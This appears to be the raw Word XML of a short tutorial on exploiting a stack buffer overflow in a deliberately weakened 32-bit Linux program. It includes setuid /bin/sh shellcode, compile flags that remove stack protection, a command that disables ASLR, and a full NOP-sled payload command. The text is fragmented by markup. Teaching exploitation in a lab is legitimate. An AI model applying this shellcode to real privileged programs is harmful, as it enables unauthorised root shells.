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003" w:rsidRDefault="009E0003"/>
    <w:p w:rsidR="00D00C3F" w:rsidRDefault="00D00C3F"/>
    <w:p w:rsidR="00D00C3F" w:rsidRDefault="00D00C3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This tutorial goes over the basic technique of how to exploit a buffer overflow vulnerability with an example. This tutorial assumes that you already have: basic C knowledge,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gdb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and how programs represent memory. The source code for the program can be downloaded at </w:t>
      </w:r>
      <w:hyperlink r:id="rId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https://drive.google.com/file/d/0B8b0...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D00C3F" w:rsidRDefault="00D00C3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D00C3F" w:rsidRDefault="00D00C3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The 46 byte shellcode used in this program is </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00C3F" w:rsidRDefault="00D00C3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"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00C3F" w:rsidRDefault="00D00C3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D00C3F" w:rsidRDefault="00D00C3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The compiling line is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-o example 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-stack-protector -m32 -z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execstack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example.c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-stack-protector === Removes the canary value at the end of the buffer -m32 === Sets the program to compile into a 32 bit program -z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execstack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=== Makes the stack executable NOTE: If this tutorial is not working it is likely that you have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aslr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enabled. To disable it run the following command in your terminal echo 0 |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tee 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/sys/kernel/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randomize_va_space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When you are finished I strongly recommend you turn it back on with the command echo 2 |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tee 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/sys/kernel/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randomize_va_space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00670609" w:rsidRDefault="0067060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670609" w:rsidRDefault="0067060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670609" w:rsidRDefault="00670609" w:rsidP="0067060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"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00670609" w:rsidRDefault="00670609"/>
    <w:p w:rsidR="00670609" w:rsidRDefault="00670609"/>
    <w:p w:rsidR="00670609" w:rsidRPr="00670609" w:rsidRDefault="00670609" w:rsidP="00670609">
      <w:r w:rsidRPr="00670609">
        <w:t>./example $(python -c "print('\x90'*222 +'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xf</w:t>
      </w:r>
      <w:r w:rsidR="00B743E8">
        <w:t>f\x2f\x62\x69\x6e\x2f\x73\x68'+’\xd0\xce\xff\xff’}</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00B743E8">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00670609">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00670609" w:rsidRPr="0067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2D"/>
    <w:rsid w:val="003E7F2D"/>
    <w:rsid w:val="005B2568"/>
    <w:rsid w:val="00670609"/>
    <w:rsid w:val="00807D55"/>
    <w:rsid w:val="009E0003"/>
    <w:rsid w:val="00B743E8"/>
    <w:rsid w:val="00D0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CB0B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5FF8A84D-79CB-4220-95A9-C72F74CF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0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q=https%3A%2F%2Fdrive.google.com%2Ffile%2Fd%2F0B8b0M2LATseXYWRiVHdkaGhwRjg%2Fview%3Fusp%3Dsharing&amp;redir_token=z6CtVsl0Xb6ovnOZOjW4ziR5v7p8MTU0MDg4ODAyN0AxNTQwODAxNjI3&amp;v=hJ8Iwyhqz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2018-10-29T08:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-29T10:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>